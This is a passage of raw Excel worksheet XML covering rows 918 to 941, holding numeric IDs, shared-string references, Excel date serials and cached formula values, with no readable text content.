      <c r="H918" s="1" t="s">
        <v>4003</v>
      </c>
      <c r="I918" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J918" s="1" t="s">
        <v>4004</v>
      </c>
      <c r="K918" s="2" t="s">
        <v>4005</v>
      </c>
      <c r="L918" s="1">
        <v>1.0</v>
      </c>
      <c r="M918" s="1">
        <v>1.0</v>
      </c>
      <c r="N918" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O918" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P918" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q918" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R918" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S918" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="919">
      <c r="A919" s="1">
        <v>10739.0</v>
      </c>
      <c r="B919" s="2" t="s">
        <v>4006</v>
      </c>
      <c r="C919" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D919" s="2" t="s">
        <v>4007</v>
      </c>
      <c r="E919" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F919" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G919" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H919" s="1" t="s">
        <v>4008</v>
      </c>
      <c r="I919" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J919" s="1" t="s">
        <v>4009</v>
      </c>
      <c r="K919" s="2" t="s">
        <v>4010</v>
      </c>
      <c r="L919" s="1">
        <v>1.0</v>
      </c>
      <c r="M919" s="1">
        <v>1.0</v>
      </c>
      <c r="N919" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O919" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P919" s="1" t="s">
        <v>1865</v>
      </c>
      <c r="Q919" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R919" s="2">
        <f t="shared" si="2"/>
        <v>8</v>
      </c>
      <c r="S919" s="1">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
    </row>
    <row r="920">
      <c r="A920" s="1">
        <v>10740.0</v>
      </c>
      <c r="B920" s="2" t="s">
        <v>4011</v>
      </c>
      <c r="C920" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D920" s="2" t="s">
        <v>4012</v>
      </c>
      <c r="E920" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F920" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G920" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H920" s="1" t="s">
        <v>4013</v>
      </c>
      <c r="I920" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J920" s="1" t="s">
        <v>4014</v>
      </c>
      <c r="K920" s="2" t="s">
        <v>4015</v>
      </c>
      <c r="L920" s="1">
        <v>1.0</v>
      </c>
      <c r="M920" s="1">
        <v>1.0</v>
      </c>
      <c r="N920" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O920" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P920" s="1" t="s">
        <v>4016</v>
      </c>
      <c r="Q920" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R920" s="2">
        <f t="shared" si="2"/>
        <v>8</v>
      </c>
      <c r="S920" s="1">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
    </row>
    <row r="921">
      <c r="A921" s="1">
        <v>10857.0</v>
      </c>
      <c r="B921" s="2" t="s">
        <v>4017</v>
      </c>
      <c r="C921" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D921" s="2" t="s">
        <v>4018</v>
      </c>
      <c r="E921" s="2" t="s">
        <v>124</v>
      </c>
      <c r="F921" s="1" t="s">
        <v>4019</v>
      </c>
      <c r="G921" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H921" s="4">
        <v>43293.26944444444</v>
      </c>
      <c r="I921" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J921" s="1" t="s">
        <v>4020</v>
      </c>
      <c r="K921" s="2" t="s">
        <v>4021</v>
      </c>
      <c r="L921" s="1">
        <v>2.0</v>
      </c>
      <c r="M921" s="1">
        <v>2.0</v>
      </c>
      <c r="N921" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O921" s="1" t="s">
        <v>4022</v>
      </c>
      <c r="P921" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q921" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R921" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S921" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="922">
      <c r="A922" s="1">
        <v>11115.0</v>
      </c>
      <c r="B922" s="2" t="s">
        <v>4023</v>
      </c>
      <c r="C922" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D922" s="2" t="s">
        <v>4024</v>
      </c>
      <c r="E922" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F922" s="1" t="s">
        <v>4025</v>
      </c>
      <c r="G922" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H922" s="1" t="s">
        <v>4026</v>
      </c>
      <c r="I922" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J922" s="1" t="s">
        <v>4027</v>
      </c>
      <c r="K922" s="2" t="s">
        <v>4028</v>
      </c>
      <c r="L922" s="1">
        <v>3.0</v>
      </c>
      <c r="M922" s="1">
        <v>4.0</v>
      </c>
      <c r="N922" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O922" s="1" t="s">
        <v>4029</v>
      </c>
      <c r="P922" s="1" t="s">
        <v>4030</v>
      </c>
      <c r="Q922" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R922" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S922" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="923">
      <c r="A923" s="1">
        <v>11116.0</v>
      </c>
      <c r="B923" s="2" t="s">
        <v>4031</v>
      </c>
      <c r="C923" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D923" s="2" t="s">
        <v>4024</v>
      </c>
      <c r="E923" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F923" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G923" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H923" s="1" t="s">
        <v>4032</v>
      </c>
      <c r="I923" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J923" s="1" t="s">
        <v>4027</v>
      </c>
      <c r="K923" s="2" t="s">
        <v>4028</v>
      </c>
      <c r="L923" s="1">
        <v>3.0</v>
      </c>
      <c r="M923" s="1">
        <v>4.0</v>
      </c>
      <c r="N923" s="1" t="s">
        <v>2051</v>
      </c>
      <c r="O923" s="1" t="s">
        <v>4029</v>
      </c>
      <c r="P923" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q923" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R923" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S923" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="924">
      <c r="A924" s="1">
        <v>11119.0</v>
      </c>
      <c r="B924" s="2" t="s">
        <v>4033</v>
      </c>
      <c r="C924" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D924" s="2" t="s">
        <v>4034</v>
      </c>
      <c r="E924" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F924" s="1" t="s">
        <v>1076</v>
      </c>
      <c r="G924" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H924" s="1" t="s">
        <v>4035</v>
      </c>
      <c r="I924" s="1" t="s">
        <v>1078</v>
      </c>
      <c r="J924" s="1" t="s">
        <v>4036</v>
      </c>
      <c r="K924" s="2" t="s">
        <v>4037</v>
      </c>
      <c r="L924" s="1">
        <v>1.0</v>
      </c>
      <c r="M924" s="1">
        <v>1.0</v>
      </c>
      <c r="N924" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O924" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P924" s="1" t="s">
        <v>4038</v>
      </c>
      <c r="Q924" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R924" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S924" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="925">
      <c r="A925" s="1">
        <v>11121.0</v>
      </c>
      <c r="B925" s="2" t="s">
        <v>4039</v>
      </c>
      <c r="C925" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D925" s="2" t="s">
        <v>4040</v>
      </c>
      <c r="E925" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F925" s="1" t="s">
        <v>4041</v>
      </c>
      <c r="G925" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H925" s="4">
        <v>44475.15902777778</v>
      </c>
      <c r="I925" s="1" t="s">
        <v>54</v>
      </c>
      <c r="J925" s="1" t="s">
        <v>4042</v>
      </c>
      <c r="K925" s="2" t="s">
        <v>4043</v>
      </c>
      <c r="L925" s="1">
        <v>9.0</v>
      </c>
      <c r="M925" s="1">
        <v>16.0</v>
      </c>
      <c r="N925" s="1" t="s">
        <v>677</v>
      </c>
      <c r="O925" s="1" t="s">
        <v>4044</v>
      </c>
      <c r="P925" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q925" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R925" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S925" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="926">
      <c r="A926" s="1">
        <v>11230.0</v>
      </c>
      <c r="B926" s="2" t="s">
        <v>4045</v>
      </c>
      <c r="C926" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D926" s="2" t="s">
        <v>4046</v>
      </c>
      <c r="E926" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F926" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G926" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H926" s="1" t="s">
        <v>4047</v>
      </c>
      <c r="I926" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J926" s="1" t="s">
        <v>4048</v>
      </c>
      <c r="K926" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="L926" s="1">
        <v>1.0</v>
      </c>
      <c r="M926" s="1">
        <v>1.0</v>
      </c>
      <c r="N926" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O926" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P926" s="1" t="s">
        <v>1865</v>
      </c>
      <c r="Q926" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R926" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S926" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="927">
      <c r="A927" s="1">
        <v>11244.0</v>
      </c>
      <c r="B927" s="2" t="s">
        <v>4050</v>
      </c>
      <c r="C927" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D927" s="2" t="s">
        <v>4051</v>
      </c>
      <c r="E927" s="2" t="s">
        <v>1001</v>
      </c>
      <c r="F927" s="1" t="s">
        <v>4052</v>
      </c>
      <c r="G927" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H927" s="4">
        <v>43894.365277777775</v>
      </c>
      <c r="I927" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J927" s="1" t="s">
        <v>4053</v>
      </c>
      <c r="K927" s="2" t="s">
        <v>4054</v>
      </c>
      <c r="L927" s="1">
        <v>5.0</v>
      </c>
      <c r="M927" s="1">
        <v>11.0</v>
      </c>
      <c r="N927" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O927" s="1" t="s">
        <v>4055</v>
      </c>
      <c r="P927" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q927" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R927" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S927" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="928">
      <c r="A928" s="1">
        <v>11337.0</v>
      </c>
      <c r="B928" s="2" t="s">
        <v>4056</v>
      </c>
      <c r="C928" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D928" s="2" t="s">
        <v>4057</v>
      </c>
      <c r="E928" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F928" s="1" t="s">
        <v>4058</v>
      </c>
      <c r="G928" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H928" s="1" t="s">
        <v>4059</v>
      </c>
      <c r="I928" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J928" s="1" t="s">
        <v>4060</v>
      </c>
      <c r="K928" s="2" t="s">
        <v>4061</v>
      </c>
      <c r="L928" s="1">
        <v>6.0</v>
      </c>
      <c r="M928" s="1">
        <v>6.0</v>
      </c>
      <c r="N928" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O928" s="1" t="s">
        <v>4062</v>
      </c>
      <c r="P928" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q928" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R928" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S928" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="929">
      <c r="A929" s="1">
        <v>11338.0</v>
      </c>
      <c r="B929" s="2" t="s">
        <v>4056</v>
      </c>
      <c r="C929" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D929" s="2" t="s">
        <v>4057</v>
      </c>
      <c r="E929" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F929" s="1" t="s">
        <v>4058</v>
      </c>
      <c r="G929" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H929" s="1" t="s">
        <v>4063</v>
      </c>
      <c r="I929" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J929" s="1" t="s">
        <v>4064</v>
      </c>
      <c r="K929" s="2" t="s">
        <v>4061</v>
      </c>
      <c r="L929" s="1">
        <v>7.0</v>
      </c>
      <c r="M929" s="1">
        <v>7.0</v>
      </c>
      <c r="N929" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O929" s="1" t="s">
        <v>4065</v>
      </c>
      <c r="P929" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q929" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R929" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S929" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="930">
      <c r="A930" s="1">
        <v>11340.0</v>
      </c>
      <c r="B930" s="2" t="s">
        <v>4066</v>
      </c>
      <c r="C930" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D930" s="2" t="s">
        <v>4057</v>
      </c>
      <c r="E930" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F930" s="1" t="s">
        <v>4067</v>
      </c>
      <c r="G930" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H930" s="1" t="s">
        <v>4068</v>
      </c>
      <c r="I930" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J930" s="1" t="s">
        <v>4060</v>
      </c>
      <c r="K930" s="2" t="s">
        <v>4061</v>
      </c>
      <c r="L930" s="1">
        <v>6.0</v>
      </c>
      <c r="M930" s="1">
        <v>6.0</v>
      </c>
      <c r="N930" s="1" t="s">
        <v>4069</v>
      </c>
      <c r="O930" s="1" t="s">
        <v>4062</v>
      </c>
      <c r="P930" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q930" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R930" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S930" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="931">
      <c r="A931" s="1">
        <v>11350.0</v>
      </c>
      <c r="B931" s="2" t="s">
        <v>4070</v>
      </c>
      <c r="C931" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D931" s="2" t="s">
        <v>4071</v>
      </c>
      <c r="E931" s="2" t="s">
        <v>684</v>
      </c>
      <c r="F931" s="1" t="s">
        <v>731</v>
      </c>
      <c r="G931" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H931" s="4">
        <v>44871.89166666667</v>
      </c>
      <c r="I931" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J931" s="1" t="s">
        <v>4072</v>
      </c>
      <c r="K931" s="2" t="s">
        <v>4073</v>
      </c>
      <c r="L931" s="1">
        <v>3.0</v>
      </c>
      <c r="M931" s="1">
        <v>3.0</v>
      </c>
      <c r="N931" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O931" s="1" t="s">
        <v>4074</v>
      </c>
      <c r="P931" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q931" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R931" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S931" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="932">
      <c r="A932" s="1">
        <v>11351.0</v>
      </c>
      <c r="B932" s="2" t="s">
        <v>4075</v>
      </c>
      <c r="C932" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D932" s="2" t="s">
        <v>4071</v>
      </c>
      <c r="E932" s="2" t="s">
        <v>684</v>
      </c>
      <c r="F932" s="1" t="s">
        <v>2144</v>
      </c>
      <c r="G932" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H932" s="4">
        <v>44871.916666666664</v>
      </c>
      <c r="I932" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J932" s="1" t="s">
        <v>4072</v>
      </c>
      <c r="K932" s="2" t="s">
        <v>4073</v>
      </c>
      <c r="L932" s="1">
        <v>3.0</v>
      </c>
      <c r="M932" s="1">
        <v>3.0</v>
      </c>
      <c r="N932" s="1" t="s">
        <v>632</v>
      </c>
      <c r="O932" s="1" t="s">
        <v>4074</v>
      </c>
      <c r="P932" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q932" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R932" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S932" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="933">
      <c r="A933" s="1">
        <v>11353.0</v>
      </c>
      <c r="B933" s="2" t="s">
        <v>4076</v>
      </c>
      <c r="C933" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D933" s="2" t="s">
        <v>4077</v>
      </c>
      <c r="E933" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F933" s="1" t="s">
        <v>1187</v>
      </c>
      <c r="G933" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H933" s="4">
        <v>44508.71666666667</v>
      </c>
      <c r="I933" s="1" t="s">
        <v>4078</v>
      </c>
      <c r="J933" s="1" t="s">
        <v>4079</v>
      </c>
      <c r="K933" s="2" t="s">
        <v>4080</v>
      </c>
      <c r="L933" s="1">
        <v>2.0</v>
      </c>
      <c r="M933" s="1">
        <v>2.0</v>
      </c>
      <c r="N933" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O933" s="1" t="s">
        <v>4081</v>
      </c>
      <c r="P933" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q933" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R933" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S933" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="934">
      <c r="A934" s="1">
        <v>11355.0</v>
      </c>
      <c r="B934" s="2" t="s">
        <v>4082</v>
      </c>
      <c r="C934" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D934" s="2" t="s">
        <v>4083</v>
      </c>
      <c r="E934" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F934" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G934" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H934" s="4">
        <v>44532.74513888889</v>
      </c>
      <c r="I934" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J934" s="1" t="s">
        <v>4084</v>
      </c>
      <c r="K934" s="2" t="s">
        <v>4085</v>
      </c>
      <c r="L934" s="1">
        <v>1.0</v>
      </c>
      <c r="M934" s="1">
        <v>1.0</v>
      </c>
      <c r="N934" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O934" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P934" s="1" t="s">
        <v>602</v>
      </c>
      <c r="Q934" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R934" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S934" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="935">
      <c r="A935" s="1">
        <v>11393.0</v>
      </c>
      <c r="B935" s="2" t="s">
        <v>4086</v>
      </c>
      <c r="C935" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D935" s="2" t="s">
        <v>4087</v>
      </c>
      <c r="E935" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F935" s="1" t="s">
        <v>980</v>
      </c>
      <c r="G935" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H935" s="4">
        <v>44475.904861111114</v>
      </c>
      <c r="I935" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J935" s="1" t="s">
        <v>4088</v>
      </c>
      <c r="K935" s="2" t="s">
        <v>4089</v>
      </c>
      <c r="L935" s="1">
        <v>2.0</v>
      </c>
      <c r="M935" s="1">
        <v>2.0</v>
      </c>
      <c r="N935" s="1" t="s">
        <v>4090</v>
      </c>
      <c r="O935" s="1" t="s">
        <v>4090</v>
      </c>
      <c r="P935" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q935" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R935" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S935" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="936">
      <c r="A936" s="1">
        <v>11400.0</v>
      </c>
      <c r="B936" s="2" t="s">
        <v>4091</v>
      </c>
      <c r="C936" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D936" s="2" t="s">
        <v>4092</v>
      </c>
      <c r="E936" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F936" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G936" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H936" s="4">
        <v>44353.68472222222</v>
      </c>
      <c r="I936" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J936" s="1" t="s">
        <v>4093</v>
      </c>
      <c r="K936" s="2" t="s">
        <v>4094</v>
      </c>
      <c r="L936" s="1">
        <v>1.0</v>
      </c>
      <c r="M936" s="1">
        <v>1.0</v>
      </c>
      <c r="N936" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O936" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P936" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q936" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R936" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S936" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="937">
      <c r="A937" s="1">
        <v>11401.0</v>
      </c>
      <c r="B937" s="2" t="s">
        <v>4095</v>
      </c>
      <c r="C937" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D937" s="2" t="s">
        <v>4096</v>
      </c>
      <c r="E937" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F937" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G937" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H937" s="4">
        <v>44870.342361111114</v>
      </c>
      <c r="I937" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J937" s="1" t="s">
        <v>4097</v>
      </c>
      <c r="K937" s="2" t="s">
        <v>4098</v>
      </c>
      <c r="L937" s="1">
        <v>3.0</v>
      </c>
      <c r="M937" s="1">
        <v>4.0</v>
      </c>
      <c r="N937" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O937" s="1" t="s">
        <v>4099</v>
      </c>
      <c r="P937" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q937" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R937" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S937" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="938">
      <c r="A938" s="1">
        <v>11402.0</v>
      </c>
      <c r="B938" s="2" t="s">
        <v>4100</v>
      </c>
      <c r="C938" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D938" s="2" t="s">
        <v>4096</v>
      </c>
      <c r="E938" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F938" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G938" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H938" s="4">
        <v>44870.34375</v>
      </c>
      <c r="I938" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J938" s="1" t="s">
        <v>4101</v>
      </c>
      <c r="K938" s="2" t="s">
        <v>4098</v>
      </c>
      <c r="L938" s="1">
        <v>1.0</v>
      </c>
      <c r="M938" s="1">
        <v>1.0</v>
      </c>
      <c r="N938" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O938" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P938" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q938" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R938" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S938" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="939">
      <c r="A939" s="1">
        <v>11404.0</v>
      </c>
      <c r="B939" s="2" t="s">
        <v>4102</v>
      </c>
      <c r="C939" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D939" s="2" t="s">
        <v>4096</v>
      </c>
      <c r="E939" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F939" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G939" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H939" s="4">
        <v>44870.822222222225</v>
      </c>
      <c r="I939" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J939" s="1" t="s">
        <v>4097</v>
      </c>
      <c r="K939" s="2" t="s">
        <v>4098</v>
      </c>
      <c r="L939" s="1">
        <v>3.0</v>
      </c>
      <c r="M939" s="1">
        <v>4.0</v>
      </c>
      <c r="N939" s="1" t="s">
        <v>4103</v>
      </c>
      <c r="O939" s="1" t="s">
        <v>4099</v>
      </c>
      <c r="P939" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q939" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R939" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S939" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="940">
      <c r="A940" s="1">
        <v>11653.0</v>
      </c>
      <c r="B940" s="2" t="s">
        <v>4104</v>
      </c>
      <c r="C940" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D940" s="2" t="s">
        <v>4105</v>
      </c>
      <c r="E940" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F940" s="1" t="s">
        <v>4106</v>
      </c>
      <c r="G940" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H940" s="1" t="s">
        <v>4107</v>
      </c>
      <c r="I940" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J940" s="1" t="s">
        <v>4108</v>
      </c>
      <c r="K940" s="2" t="s">
        <v>4109</v>
      </c>
      <c r="L940" s="1">
        <v>8.0</v>
      </c>
      <c r="M940" s="1">
        <v>15.0</v>
      </c>
      <c r="N940" s="1" t="s">
        <v>4110</v>
      </c>
      <c r="O940" s="1" t="s">
        <v>4111</v>
      </c>
      <c r="P940" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q940" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R940" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S940" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="941">
      <c r="A941" s="1">
        <v>11693.0</v>
      </c>
      <c r="B941" s="2" t="s">
        <v>4112</v>
      </c>
      <c r="C941" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D941" s="2" t="s">
        <v>4113</v>
      </c>
      <c r="E941" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F941" s="1" t="s">
        <v>4114</v>
      </c>
      <c r="G941" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H941" s="1" t="s">
        <v>4115</v>
      </c>
      <c r="I941" s="1" t="s">
        <v>623</v>
      </c>
      <c r="J941" s="1" t="s">
        <v>4116</v>
      </c>
      <c r="K941" s="2" t="s">
        <v>4117</v>
      </c>
      <c r="L941" s="1">
        <v>2.0</v>
      </c>
      <c r="M941" s="1">
        <v>4.0</v>
      </c>
      <c r="N941" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O941" s="1" t="s">
        <v>4118</v>
      </c>
      <c r="P941" s="1" t="s">
        <v>39</v>
      </c>
      <c r="Q941" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
